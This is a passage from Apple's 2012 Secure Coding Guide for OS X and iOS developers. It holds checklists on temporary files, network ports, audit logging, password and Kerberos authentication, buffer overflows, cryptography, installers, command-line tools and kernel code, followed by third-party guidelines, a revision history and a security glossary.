Data, Configuration, and Temporary Files Some security vulnerabilities are related to reading or writing files. This checklist is intended to help you find any such vulnerabilities in your code. 1. Be careful when working with files in untrusted locations. If you write to any directory owned by the user, then there is a possibility that the user will modify or corrupt your files. Similarly, if you write temporary files to a publicly writable place (for example, /tmp, /var/tmp, /Library/Caches or another specific place with this characteristic), an attacker may be able to modify your files before the next time you read them. If your code reads and writes files (and in particular if it uses files for interprocess communication), you should put those files in a safe directory to which only you have write access. For more information about vulnerabilities associated with writing files, and how to minimize the risks, see “Time of Check Versus Time of Use” (page 44). 2. Avoid untrusted configuration files, preference files, or environment variables. In many cases, the user can control environment variables, configuration files, and preferences. If you are executing a program for the user with elevated privileges, you are giving the user the opportunity to perform operations that they cannot ordinarily do. Therefore, you should ensure that the behavior of your privileged code does not depend on these things. Security Development Checklists Data, Configuration, and Temporary Files 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 88This means: ● Validate all input, whether directly from the user or through environment variables, configuration files, preferences files, or other files. In the case of environment variables, the effect might not be immediate or obvious; however the user might be able to modify the behavior of your program or of other programs or system calls. ● Make sure that file paths do not contain wildcard characters, such as ../ or ~, which an attacker can use to switch the current directory to one under the attacker’s control. ● Explicitly set the privileges, environment variables, and resources available to the running process, rather than assuming that the process has inherited the correct environment. 3. Load kernel extensions carefully (or not at all). A kernel extension is the ultimate privileged code—it has access to levels of the operating system that cannot be touched by ordinary code, even running as root. You must be extremely careful why, how, and when you load a kernel extension to guard against being fooled into loading the wrong one. It’s possible to load a root kit if you’re notsufficiently careful. (A root kit is malicious code that, by running in the kernel, can not only take over control of the system but can cover up all evidence of its own existence.) To make sure that an attacker hasn’t somehow substituted his or her own kernel extension for yours, you should always store kernel extensions in secure locations. You may, if desired, use code signing or hashes to further verify their authenticity, but this does not remove the need to protect the extension with appropriate permissions. (Time-of-check vs. time-of-use attacks are still possible.) Note that in recent versions of OS X, this is partially mitigated by the KEXT loading system, which refuses to load any kext binary whose owner is not root or whose group is not wheel. In general, you should avoid writing kernel extensions (see “Keep Out” in Kernel Programming Guide ). However, if you must use a kernel extension, use the facilities built into OS X to load your extension and be sure to load the extension from a separate privileged process. See “Elevating Privileges Safely” (page 59) to learn more about the safe use of root access. See Kernel Programming Guide for more information on writing and loading kernel extensions. For help on writing device drivers, see I/O Kit Fundamentals. Network Port Use This checklist is intended to help you find vulnerabilities related to sending and receiving information over a network. If your project does not contain any tool or application that sends or receives information over a network, skip to “Audit Logs” (page 91) (for servers) or “Integer and Buffer Overflows” (page 97) for all other products. 1. Use assigned port numbers. Security Development Checklists Network Port Use 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 89Port numbers 0 through 1023 are reserved for use by certain services specified by the Internet Assigned Numbers Authority (IANA; see http://www.iana.org/). On many systems including OS X, only processes running asroot can bind to these ports. It is notsafe, however, to assume that any communications coming over these privileged ports can be trusted. It’s possible that an attacker has obtained root access and used it to bind to a privileged port. Furthermore, on some systems, root access is not needed to bind to these ports. You should also be aware that if you use the SO_REUSEADDR socket option with UDP, it is possible for a local attacker to hijack your port. Therefore, you should always use port numbers assigned by the IANA, you should always check return codes to make sure you have connected successfully, and you should check that you are connected to the correct port. Also, as always, never trust input data, even if it’s coming over a privileged port. Whether data is being read from a file, entered by a user, or received over a network, you must validate all input. See “Validating Input And Interprocess Communication” (page 33) for more information about validating input. 2. Choose an appropriate transport protocol. Lower-level protocols, such as UDP, provide higher performance for some types of traffic, but are easier to spoof than higher-level protocols, such as TCP. Note that if you’re using TCP, you still need to worry about authenticating both ends of the connection, but there are encryption layers you can add to increase security. 3. Use existing authentication services when authentication is needed. If you’re providing a free and nonconfidential service, and do not process user input, then authentication is not necessary. On the other hand, if any secret information is being exchanged, the user is allowed to enter data that your program processes, or there is any reason to restrict user access, then you should authenticate every user. OS X provides a variety of secure network APIs and authorization services, all of which perform authentication. You should always use these services rather than creating your own authentication mechanism. For one thing, authentication is very difficult to do correctly, and dangerous to get wrong. If an attacker breaks your authentication scheme, you could compromise secrets or give the attacker an entry to your system. The only approved authorization mechanism for networked applications is Kerberos; see “Client-Server Authentication” (page 93). For more information on secure networking, see Secure Transport Reference and CFNetwork Programming Guide . 4. Verify access programmatically. UI limitations do not protect your service from attack. If your service provides functionality that should only be accessible to certain users, that service must perform appropriate checks to determine whether the current user is authorized to access that functionality. Security Development Checklists Network Port Use 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 90If you do not do this, then someone sufficiently familiar with your service can potentially perform unauthorized operations by modifying URLs, sending malicious Apple events, and so on. 5. Fail gracefully. If a server is unavailable, either because of some problem with the network or because the server is under a denial of service attack, your client application should limit the frequency and number of retries and should give the user the opportunity to cancel the operation. Poorly-designed clientsthat retry connectionstoo frequently and too insistently, or that hang while waiting for a connection, can inadvertently contribute to—or cause their own—denial of service. 6. Design your service to handle high connection volume. Your daemon should be capable of surviving a denial of service attack without crashing or losing data. In addition, you should limit the total amount of processor time, memory, and disk space each daemon can use, so that a denial of service attack on any given daemon does not result in denial of service to every process on the system. You can use the ipfwfirewall program to control packets and traffic flow for internet daemons. For more information on ipfw, see the ipfw(8) manual page. See Wheeler, Secure Programming for Linux and Unix HOWTO, available at http://www.dwheeler.com/secure-programs/, for more advice on dealing with denial of service attacks. 7. Design hash functions carefully. Hash tables are often used to improve search performance. However, when there are hash collisions(where two items in the list have the same hash result), a slower (often linear) search must be used to resolve the conflict. If it is possible for a user to deliberately generate different requeststhat have the same hash result, by making many such requests an attacker can mount a denial of service attack. It is possible to design hash tables that use complex data structures such as trees in the collision case. Doing so can significantly reduce the damage caused by these attacks. Audit Logs It’s very important to audit attempts to connect to a server or to gain authorization to use a secure program. If someone is attempting to attack your program, you should know what they are doing and how they are doing it. Furthermore, if your program is attacked successfully, your audit log is the only way you can determine what happened and how extensive the security breach was. This checklist is intended to help you make sure you have an adequate logging mechanism in place. Security Development Checklists Audit Logs 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 91Important: Don’t log confidential data, such as passwords, which could then be read later by a malicious user. 1. Audit attempts to connect. Your daemon orsecure program should audit connection attempts(both successful attempts and failures). Note that an attacker can attempt to use the audit log itself to create a denial of service attack; therefore, you should limit the rate of entering audit messages and the total size of the log file. You also need to validate the input to the log itself, so that an attacker can’t enter special characters such as the newline character that you might misinterpret when reading the log. See Wheeler, Secure Programming for Linux and Unix HOWTO for some advice on audit logs. 2. Use the libbsm auditing library where possible. The libbsm auditing library is part of the TrustedBSD project, which in turn is a set of trusted extensions to the FreeBSD operating system. Apple has contributed to this project and has incorporated the audit library into the Darwin kernel of the OS X operating system. (This library is not available in iOS.) You can use the libbsm auditing library to implement auditing of your program for login and authorization attempts. This library gives you a lot of control over which events are audited and how to handle denial of service attacks. The libbsm project is located at http://www.opensource.apple.com/darwinsource/Current/bsm/. For documentation of the BSM service, see the “Auditing Topics” chapter in Sun Microsystems’ System Administration Guide: Security Services located at http://docs.sun.com/app/docs/doc/806- 4078/6jd6cjs67?a=view. 3. If you cannot use libbsm, be careful when writing audit trails. When using audit mechanisms other than libbsm, there are a number of pitfalls you should avoid, depending on what audit mechanism you are using: ● syslog Prior to the implementation of the libbsm auditing library, the standard C library function syslog was most commonly used to write data to a log file. If you are using syslog, consider switching to libbsm, which gives you more options to deal with denial of service attacks. If you want to stay with syslog, be sure your auditing code is resistant to denial of service attacks, as discussed in step 1. ● Custom log file If you have implemented your own custom logging service, consider switching to libbsm to avoid inadvertently creating a security vulnerability. In addition, if you use libbsm your code will be more easily maintainable and will benefit from future enhancements to the libbsm code. If you stick with your own custom logging service, you must make certain that it is resistant to denial of service attacks (see step 1) and that an attacker can’t tamper with the contents of the log file. Security Development Checklists Audit Logs 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 92Because your log file must be either encrypted or protected with access controlsto prevent tampering, you must also provide tools for reading and processing your log file. Finally, be sure your custom logging code is audited for security vulnerabilities. Client-Server Authentication If any private or secret information is passed between a daemon and a client process, both ends of the connection should be authenticated. This checklist is intended to help you determine whether your daemon’s authentication mechanism is safe and adequate. If you are not writing a daemon, skip to “Integer and Buffer Overflows” (page 97). 1. Do not store, validate, or modify passwords yourself. It’s a very bad idea to store, validate, or modify passwords yourself, as it’s very hard to do so securely, and OS X and iOS provide secure facilities for just that purpose. ● In OS X, you can use the keychain to store passwords and Authorization Services to create, modify, delete, and validate user passwords (see Keychain Services Programming Guide and Authorization Services Programming Guide ). ● In OS X, if you have access to an OS X Server setup, you can use Open Directory (see Open Directory Programming Guide ) to store passwords and authenticate users. ● On an iOS device, you can use the keychain to store passwords. iOS devices authenticate the application that is attempting to obtain a keychain item rather than asking the user for a password. By storing data in the keychain, you also ensure that they remain encrypted in any device backups. 2. Never send passwords over a network connection in cleartext form. You should never assume that an unencrypted network connection issecure. Information on an unencrypted network can be intercepted by any individual or organization between the client and the server. Even an intranet, which does not go outside of your company, is not secure. A large percentage of cyber crime is committed by company insiders, who can be assumed to have accessto a network inside a firewall. OS X provides APIs for secure network connections; see Secure Transport Reference and CFNetwork Programming Guide for details. 3. Use server authentication as an anti-spoofing measure. Although server authentication is optional in the SSL/TLS protocols, you should always do it. Otherwise, an attacker might spoof your server, injuring your users and damaging your reputation in the process. 4. Use reasonable pasword policies. ● Password strength Security Development Checklists Client-Server Authentication 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 93In general, it is better to provide the user with a meansto evaluate the strength of a proposed password rather than to require specific combinations of letters, numbers, or punctuation, as arbitrary rules tend to cause people to choose bad passwords to fit the standard (Firstname.123) instead of choosing good passwords. ● Password expiration Password expiration has pros and cons. If your service transmits passwords in cleartext form, it is absolutely essential. If your password transmission is considered secure, however, password expiration can actually weaken security by causing people to choose weaker passwords that they can remember or to write their passwords down on sticky notes on their monitors. See Password Expiration Considered Harmful for more information. ● Non-password authentication Hardware-token-based authentication providesfar more security than any password scheme because the correct response changes every time you use it. These tokens should always be combined with a PIN, and you should educate your users so that they do not write their username or PIN on the token itself. ● Disabled accounts When an employee leaves or a user closes an account, the accountshould be disabled so that it cannot be compromised by an attacker. The more active accounts you have, the greater the probability that one will have a weak password. ● Expired accounts Expiring unused accounts reduces the number of active accounts, and in so doing, reduces the risk of an old account getting compromised by someone stealing a password that the user has used for some other service. Note, however, that expiring a user account without warning the user first is generally a bad idea. If you do not have a means of contacting the user, expiring accounts are generally considered poor form. ● Changing passwords You can require that the client application support the ability to change passwords, or you can require that the user change the password using a web interface on the server itself. In either case, the user (or the client, on behalf of the user) must provide the previous password along with the new password (twice unless the client is updating it programmatically over a sufficiently robust channel). ● Lost password retrieval (such as a system that triggers the user’s memory or a series of questions designed to authenticate the user without a password) Security Development Checklists Client-Server Authentication 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 94Make sure your authentication method is not so insecure that an attacker doesn’t even bother to try a password, and be careful not to leak information, such as the correct length of the password, the email address to which the recovered password is sent, or whether the user ID is valid. You should always allow (and perhaps even require) customer to choose their own security questions. Pre-written questions are inherently dangerous because any question that is general enough for you to ask it of a large number of people is: ● likely to be a request for information that a large number of that person’s friends already know. In all likelihood, everyone who attended your high school can guess (in a handful of guesses) who your kindergarten teacher was, who your high school mascot was, and so on. ● probably on your public profile on a social networking site. For example, if you ask where you were born, chances are that’s public information. Even if it isn’t on your profile, someone can dig it up through government records. ● potentially guessable given other information about the person. For example, given the last four digits of a social security number, someone’s birthdate, and the city in which that person was born, you can fairly easily guess then entire social security number. Finally, you should always allow your users the option of not filing out security questions. The mere existence of security questions makes their accounts less secure, so security-conscious individuals should be allowed to refuse those questions entirely. ● Limitations on password length (adjustable by the system administrator) In general, you should require passwords to be at least eight characters in length. (As a side note, if yourserver limits passwordsto a maximum of eight characters, you need to rethink your design. There should be no maximum password length at all, if possible.) The more of these policies you enforce, the more secure your server will be. Rather than creating your own password database—which is difficult to do securely—you should use the Apple Password Server. See Open Directory Programming Guide for more information about the Password Server, Directory Service Framework Reference for a list of Directory Services functions, and the manual pages for pwpolicy(8), passwd(1), passwd(5), and getpwent(3) at http://developer.apple.com/documentation/Darwin/Reference/ManPages/index.html for tools to access the password database and set password policies. 5. Do not store unencrypted passwords and do not reissue passwords. In order to reissue a password, you first have to cache the unencrypted password, which is bad security practice. Furthermore, when you reissue a password, you might also be reusing that password in an inappropriate security context. For example, suppose your program is running on a web server, and you use SSL to communicate with clients. If you take a client’s password and use it to log into a database server to do something on the client’s behalf, there’s no way to guarantee that the database server keeps the password secure and does Security Development Checklists Client-Server Authentication 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 95not pass it on to another server in cleartext form. Therefore, even though the password was in a secure context when it was being sent to the web server over SSL, when the web server reissues it, it’s in an insecure context. If you want to spare your client the trouble of logging in separately to each server, you should use some kind of forwardable authentication, such as Kerberos. For more information on Apple’s implementation of Kerberos, see http://developer.apple.com/darwin/projects/kerberos/. Under no circumstances should you design a system in which system administrators or other employees can see users’ passwords. Your users are trusting you with passwords that they may use for other sites; therefore, it is extremely reckless to allow anyone else to see those passwords. Administrators should be allowed to reset passwords to new values, but should never be allowed to see the passwords that are already there. 6. Support Kerberos. Kerberos is the only authorization service available over a network for OS X servers, and it offers single-sign-on capabilities. If you are writing a server to run on OS X, you should support Kerberos. When you do: a. Be sure you’re using the latest version (v5). b. Use a service-specific principal, not a host principal. Each service that uses Kerberos should have its own principal so that compromise of one key does not compromise more than one service. If you use a host principal, anyone who has your host key can spoof login by anybody on the system. The only alternative to Kerberos is combining SSL/TLS authentication with some other means of authorization such as an access control list. 7. Restrict guest access appropriately. If you allow guest access, be sure that guests are restricted in what they can do, and that your user interface makes clear to the system administrator what guests can do. Guest access should be off by default. It’s best if the administrator can disable guest access. Also, as noted previously, be sure to limit what guests can do in the code that actually performs the operation, not just in the code that generates the user interface. Otherwise, someone with sufficient knowledge ofthe systemcan potentially performthose unauthorized operationsin other ways(bymodifying URLs, for example). 8. Do not implement your own directory service. Open Directory is the directory server provided by OS X for secure storage of passwords and user authentication. It is important that you use this service and not try to implement your own, as secure directory servers are difficult to implement and an entire directory’s passwords can be compromised if it’s done wrong. See Open Directory Programming Guide for more information. 9. Scrub (zero) user passwords from memory after validation. Security Development Checklists Client-Server Authentication 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 96Passwords must be kept in memory for the minimum amount of time possible and should be written over, not just released, when no longer needed. It is possible to read data out of memory even if the application no longer has pointers to it. Integer and Buffer Overflows As discussed in “Avoiding Buffer Overflows And Underflows” (page 17), buffer overflows are a major source of security vulnerabilities. This checklist is intended to help you identify and correct buffer overflows in your program. 1. Use unsigned values when calculating memory object offsets and sizes. Signed values make it easier for an attacker to cause a buffer overflow, creating a security vulnerability, especially if your application accepts signed values from user input or other outside sources. Be aware that data structures referenced in parameters might contain signed values. See “Avoiding Integer Overflows And Underflows” (page 27) and “Calculating Buffer Sizes” (page 25) for details. 2. Check for integer overflows (or signed integer underflows) when calculating memory object offsets and sizes. You must always check for integer overflows or underflows when calculating memory offsets or sizes. Integer overflows and underflows can corrupt memory in ways that can lead to execution of arbitrary code. See “Avoiding Integer Overflows And Underflows” (page 27) and “Calculating Buffer Sizes” (page 25) for details. 3. Avoid unsafe string-handling functions. The functions strcat, strcpy, strncat, strncpy, sprintf, vsprintf, gets have no built-in checks for string length, and can lead to buffer overflows. For alternatives, read “String Handling” (page 22). Cryptographic Function Use This checklist is intended to help you determine whether your program has any vulnerabilities related to use of encryption, cryptographic algorithms, or random number generation. 1. Use trusted random number generators. Do not attempt to generate your own random numbers. Security Development Checklists Integer and Buffer Overflows 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 97There are several ways to obtain high-quality random numbers: ● In iOS, use the Randomization Services programming interface. ● In OS X: ● Read from /dev/random in OS X (see the manual page for random). ● Use the read_random function in the header file random.h in the Apple CSP module, which is part of Apple’simplementation ofthe CDSA framework (available at http://developer.apple.com/darwin/projects/security/). Note that rand does not return good random numbers and should not be used. 2. Use TLS/SSL instead of custom schemes. You should always use accepted standard protocols for secure networking. These standards have gone through peer review and so are more likely to be secure. In addition, you should always use the most recent version of these protocols. To learn more about the secure networking protocols available in OS X and iOS, read “Secure Network Communication APIs” in Cryptographic Services Guide . 3. Don’t roll your own crypto algorithms. Always use existing optimized functions. It is very difficult to implement a secure cryptographic algorithm, and good, secure cryptographic functions are readily available. To learn about the cryptographic services available in OS X and iOS, read Cryptographic Services Guide . Installation and Loading Many security vulnerabilities are caused by problems with how programs are installed or code modules are loaded. This checklist is intended to help you find any such problems in your project. 1. Don’t install components in /Library/StartupItemsor/System/Library/Extensions. Code installed into these directories runs with root permissions. Therefore, it is very important that such programs be carefully audited forsecurity vulnerabilities(as discussed in this checklist) and that they have their permissions set correctly. For information on proper permissions for startup items, see “Startup Items”. (Note that in OS X v10.4 and later,startup items are deprecated; you should use launchd to launch your daemonsinstead. See Daemons and Services Programming Guide for more information.) For information on permissions for kernel extensions, see Kernel Extension Programming Topics. (Note that beginning in OS X v10.2, OS X checks for permissions problems and refuses to load extensions unless the permissions are correct.) Security Development Checklists Installation and Loading 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 982. Don’t use custom install scripts. Custom install scripts add unnecessary complexity and risk, so when possible, you should avoid them entirely. If you must use a custom install script, you should: ● If your installerscript runsin a shell, read and follow the advice in “Shell Script Security” in Shell Scripting Primer. ● Be sure that yourscript followsthe guidelinesin this checklist just asthe rest of your application does. In particular: ● Don’t write temporary files to globally writable directories. ● Don’t execute with higher privileges than necessary. In general, your script should execute with the same privileges the user has normally, and should do its work in the user’s directory on behalf of the user. ● Don’t execute with elevated privileges any longer than necessary. ● Set reasonable permissions on your installed app. For example, don’t give everyone read/write permission to files in the app bundle if only the owner needs such permission. ● Set your installer’s file code creation mask (umask) to restrict access to the files it creates (see “Securing File Operations” (page 47)). ● Check return codes, and if anything is wrong, log the problem and report the problem to the user through the user interface. For advice on writing installation code that needs to perform privileged operations, see Authorization Services Programming Guide . For more information about writing shell scripts, read Shell Scripting Primer. 3. Load plug-ins and libraries only from secure locations. An application should load plug-ins only from secure directories. If your application loads plug-ins from directories that are not restricted, then an attacker might be able to trick the user into downloading malicious code, which your application might then load and execute. Important: In code running with elevated privileges, directories writable by the user are not considered secure locations. Be aware that the dynamic link editor (dyld) might link in plugins, depending on the environment in which your code is running. If your code uses loadable bundles (CFBundle or NSBundle), then it is dynamically loading code and could potentially load bundles written by a malicious hacker. See Code Loading Programming Topics for more information about dynamically loaded code. Security Development Checklists Installation and Loading 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 99Use of External Tools and Libraries If your program includes or uses any command-line tools, you have to look for security vulnerabilities specific to the use of such tools. This checklist is intended to help you find and correct such vulnerabilities. 1. Execute tools safely. If you are using routines such as popen or system to send commands to the shell, and you are using input from the user or received over a network to construct the command, you should be aware that these routines do not validate their input. Consequently, a malicious user can pass shell metacharacters—such as an escape sequence or other special characters—in command line arguments. These metacharacters might cause the following text to be interpreted as a new command and executed. In addition, when calling functions such as execlp, execvp, popen, or system that use the PATH environment variable to search for executables, you should always specify a complete absolute path to any tool that you want to run. If you do not, a malicious attacker can potentially cause you to run a different tool using an environment variable attack. When possible, use execvP (which takes an explicit search path argument) or avoid these functions altogether. See Viega and McGraw, Building Secure Software , AddisonWesley, 2002, andWheeler, Secure Programming for Linux andUnixHOWTO, available at http://www.dwheeler.com/secure-programs/, formore information on problems with these and similar routines and for secure ways to execute shell commands. 2. Do not pass sensitive information on the command line. If your application executes command-line tools, keep in mind that your process environment is visible to other users (see man ps(1)). You must be careful not to pass sensitive information in an insecure manner. Instead, pass sensitive information to your tool through some other means such as: ● Pipe or standard input A password is safe while being passed through a pipe; however, you must be careful that the process sending the password obtains and stores it in a safe manner. ● Environment variables Environment variables can potentially be read by other processes and thus may not be secure. If you use environment variables, you must be careful to avoid passing them to any processes that your command-line tool or script might spawn. See “Shell Script Security” in Shell Scripting Primer for details. ● Shared memory Named and globally-shared memory segments can be read by other processes. See “Interprocess Communication And Networking” (page 40) for more information aboutsecure use ofshared memory. ● Temporary file Security Development Checklists Use of External Tools and Libraries 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 100Temporary files are safe only if kept in a directory to which only your program has access. See “Data, Configuration, and Temporary Files” (page 88), earlier in this chapter, for more information on temporary files. 3. Validate all arguments (including the name). Also, remember that anyone can execute a tool—it is not executable exclusively through your program. Because all command-line arguments, including the program name (argv(0)), are under the control of the user, your tool should validate every parameter (including the name, if the tool’s behavior depends on it). Kernel Security This checklist is intended to help you program safely in the kernel. Note: Coding in the kernel poses special security risks and is seldom necessary. See Coding in the Kernel for alternatives to writing kernel-level code. 1. Verify the authenticity of Mach-based services. Kernel-level code can work directly with the Mach component. A Mach port is an endpoint of a communication channel between a client who requests a service and a server that provides the service. Mach ports are unidirectional; a reply to a service request must use a second port. If you are using Mach ports for communication between processes, you should check to make sure you are contacting the correct process. Because Mach bootstrap ports can be inherited, it is important for servers and clients to authenticate each other. You can use audit trailers for this purpose. You should create an audit record for each security-related check your program performs. See “Audit Logs” (page 91), earlier in this chapter, for more information on audit records. 2. Verify the authenticity of other user-space services. If your kernel extension was designed to communicate with only a specific user-space daemon, you should check not only the name of the process, but also the owner and group to ensure that you are communicating with the correct process. 3. Handle buffers correctly. When copying data to and from user space, you must: a. Check the bounds of the data using unsigned arithmetic—just as you check all bounds (see “Integer and Buffer Overflows” (page 97), earlier in this chapter)—to avoid buffer overflows. b. Check for and handle misaligned buffers. c. Zero all pad data when copying to or from user-space memory. Security Development Checklists Kernel Security 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 101If you or the compiler adds padding to align a data structure in some way, you should zero the padding to make sure you are not adding spurious (or even malicious) data to the user-space buffer, and to make sure that you are not accidentally leaking sensitive information that may have been in that page of memory previously. 4. Limit the memory resources a user may request. If your code does not limit the memory resources a user may request, then a malicious user can mount a denial of service attack by requesting more memory than is available in the system. 5. Sanitize any kernel log messages. Kernel code often generates messages to the console for debugging purposes. If your code does this, be careful not to include any sensitive information in the messages. 6. Don’t log too much. The kernel logging service has a limited buffer size to thwart denial of service attacks against the kernel. This means that if your kernel code logs too frequently or too much, data can be dropped. If you need to log large quantities of data for debugging purposes, you should use a different mechanism, and you must disable that mechanism before deploying your kernel extension. If you do not, then your extension could become a denial-of-service attack vector. 7. Design hash functions carefully. Hash tables are often used to improve search performance. However, when there are hash collisions(where two items in the list have the same hash result), a slower (often linear) search must be used to resolve the conflict. If it is possible for a user to deliberately generate different requeststhat have the same hash result, by making many such requests an attacker can mount a denial of service attack. It is possible to design hash tables that use complex data structures such as trees in the collision case. Doing so can significantly reduce the damage caused by these attacks. Security Development Checklists Kernel Security 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 102This appendix provides secure coding guidelines for software to be bundled with Apple products. Insecure software can pose a risk to the overall security of users’ systems. Security issues can lead to negative publicity and end-user support problems for Apple and third parties. Respect Users’ Privacy Your bundled software may use the Internet to communicate with your servers or third party servers. If so, you should provide clear and concise information to the user about what information is sent or retrieved and the reason for sending or receiving it. Encryption should be used to protect the information while in transit. Servers should be authenticated before transferring information. Provide Upgrade Information Provide information on how to upgrade to the latest version. Consider implementing a “Check for updates…” feature. Customers expect (and should receive) security fixes that affect the software version they are running. You should have a way to communicate available security fixes to customers. If possible, you should use the Mac App Store for providing upgrades. The Mac App Store provides a single, standard interface for updating all of a user’s software. The Mac App Store also provides an expedited app review process for handling critical security fixes. Store Information in Appropriate Places Store user-specific information in the home directory, with appropriate file system permissions. Take special care when dealing with shared data or preferences. Follow the guidelines about file system permissions set forth in File System Programming Guide . 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 103 Third-Party Software Security GuidelinesTake care to avoid race conditions and information disclosure when using temporary files. If possible, use a user-specific temporary file directory. Avoid Requiring Elevated Privileges Do not require or encourage users to be logged in as an admin user to install or use your application. You should regularly test your application as a normal user to make sure that it works as expected. Implement Secure Development Practices Educate your developers on how to write secure code to avoid the most common classes of vulnerabilities: ● Buffer overflows ● Integer overflows ● Race conditions ● Format string vulnerabilities Pay special attention to code that: ● deals with potentially untrusted data, such as documents or URLs ● communicates over the network ● handles passwords or other sensitive information ● runs with elevated privileges such as root or in the kernel Use APIs appropriate for the task: ● Use APIs that take security into account in their design. ● Avoid low-level C code when possible (e.g. use NSString instead of C-strings). ● Use the security features of OS X to protect user data. Test for Security As appropriate for your product, use the following QA techniques to find potential security issues: Third-Party Software Security Guidelines Avoid Requiring Elevated Privileges 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 104● Test for invalid and unexpected data in addition to testing what is expected. (Use fuzzing tools, include unit tests that test for failure, and so on.) ● Static code analysis ● Code reviews and audits Helpful Resources The other chaptersin this document describe best practicesfor writing secure code, including more information on the topics referenced above. Security Overview and Cryptographic Services Guide contain detailed information on security functionality in OS X that developers can use. Third-Party Software Security Guidelines Helpful Resources 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 105This table describes the changes to Secure Coding Guide . Date Notes 2012-06-11 Made minor typographical fixes. 2012-02-16 Fixed minor errors throughout. 2012-01-09 Updated for OS X v10.7. 2010-02-12 Added security guidelines. Added article on validating input--including the dangers of loading insecurely stored archives--and added information about the iOS where relevant. 2008-05-23 New document that describes techniques to use and factors to consider to make your code more secure from attack. 2006-05-23 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 106 Document Revision HistoryAES encryption Abbreviation for Advanced Encryption Standard encryption. A Federal Information Processing Standard (FIPS), described in FIPS publication 197. AES has been adopted by the U.S. government for the protection of sensitive, non-classified information. attacker Someone deliberately trying to make a program or operating system do something that it’s not supposed to do, such as allowing the attacker to execute code or read private data. authentication The process by which a person or other entity (such as a server) proves that it is who (or what) it says it is. Compare with authorization. authorization The process by which an entity such as a user or a server gets the right to perform a privileged operation. (Authorization can also refer to the right itself, as in “Bob has the authorization to run that program.”) Authorization usually involves first authenticating the entity and then determining whether it has the appropriate privileges. See also authentication. buffer overflow The insertion of more data into a memory buffer than was reserved for the buffer, resulting in memory locations outside the buffer being overwritten. See also heap overflow and stack overflow. CDSA Abbreviation for Common Data Security Architecture. An open software standard for a security infrastructure that provides a wide array of security services, including fine-grained access permissions, authentication of users, encryption, and secure data storage. CDSA has a standard application programming interface, called CSSM. CERT Coordination Center A center of Internet security expertise, located at the Software Engineering Institute, a federally funded research and development center operated by Carnegie Mellon University. CERT is an acronym for Computer Emergency Readiness Team.) certificate See digital certificate. Common Criteria A standardized process and set of standards that can be used to evaluate the security of software products developed by the governments of the United States, Canada, the United Kingdom, France, Germany, and the Netherlands. cracker See attacker. CSSM Abbreviation for Common Security Services Manager. A public application programming interface for CDSA. CSSM also defines an interface for plug-ins that implement security services for a particular operating system and hardware environment. CVE Abbreviation for Common Vulnerabilities and Exposures. A dictionary of standard names for security vulnerabilities located at http://www.cve.mitre.org/. You can run an Internet search on the CVE number to read details about the vulnerability. 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 107 Glossarydigital certificate A collection of data used to verify the identity of the holder. OS X supports the X.509 standard for digital certificates. exploit A program or sample code that demonstrates how to take advantage of a vulnerability.) FileVault An OS X feature, configured through the Security system preference, that encrypts everything in on the root volume (or everything in the user’s home directory prior to OS X v10.7). hacker An expert programmer—generally one with the skill to create an exploit. Most hackers do not attack other programs, and some publish exploits with the intent of forcing software developers to fix vulnerabilities. See also script kiddie. heap A region of memory reserved for use by a program during execution. Data can be written to or read from any location on the heap, which grows upward (toward highermemory addresses). Compare with stack. heap overflow A buffer overflow in the heap. homographs Characters that look the same but have different Unicode values, such as the Roman character p and the Russian glyph that is pronounced like “r”. integer overflow A buffer overflow caused by entering a number that is too large for an integer data type. Kerberos An industry-standard protocol created by the Massachusetts Institute of Technology (MIT) to provide authentication over a network. keychain A database used in OS X to store encrypted passwords, private keys, and othersecrets. It is also used to store certificates and other non-secret information that is used in cryptography and authentication. Keychain Access utility An application that can be used to manipulate data in the keychain. Keychain Services A public API that can be used to manipulate data in the keychain. level of trust The confidence a user can have in the validity of a certificate. The level of trust for a certificate is used together with the trust policy to answer the question “Should I trust this certificate for this action?” nonrepudiation A process or technique making it impossible for a user to deny performing an operation (such as using a specific credit card number). Open Directory The directory server provided by OS X for secure storage of passwords and user authentication. permissions See privileges. phishing A social engineering technique in which an email or web page that spoofs one from a legitimate businessis used to trick a user into giving personal data and secrets (such as passwords) to someone who has malicious intent. policy database A database containing the set of rules the Security Server uses to determine authorization. privileged operation An operation that requires special rights or privileges. privileges The type of access to a file or directory (read, write, execute, traverse, and so forth) granted to a user or to a group. Glossary 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 108race condition The occurrence of two events out of sequence. root kit Malicious code that, by running in the kernel, can not only take over control of the system but can also cover up all evidence of its own existence. root privileges Having the unrestricted permission to perform any operation on the system. script kiddie Someone who uses published code (scripts) to attack software and computer systems. signal A message sent from one processto another in a UNIX-based operating system (such as OS X) social engineering As applied to security, tricking a user into giving up secrets or into giving access to a computer to an attacker. smart card A plastic card similar in size to a credit card that has memory and a microprocessor embedded in it. A smart card can store and process information, including passwords, certificates, and keys. stack A region of memory reserved for use by a specific program and used to control program flow. Data is put on the stack and removed in a last-in–first-out fashion. The stack grows downward (toward lower memory addresses). Compare with heap. stack overflow A buffer overflow on the stack. time of check–time of use (TOCTOU) A race condition in which an attacker creates, writes to, or alters a file between the time when a program checks the status of the file and when the program writes to it. trust policy A set of rules that specify the appropriate uses for a certificate that has a specific level of trust. For example, the trust policy for a browser might state that if a certificate has expired, the user should be prompted for permission before a secure session is opened with a web server. vulnerability A feature of the way a program was written—either a design flaw or a bug—that makes it possible for a hacker or script kiddie to attack the program. Glossary 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 109Symbols _unknown user 84 A access control 14 applications factoring 69 interfaces 73–78 arguments, command 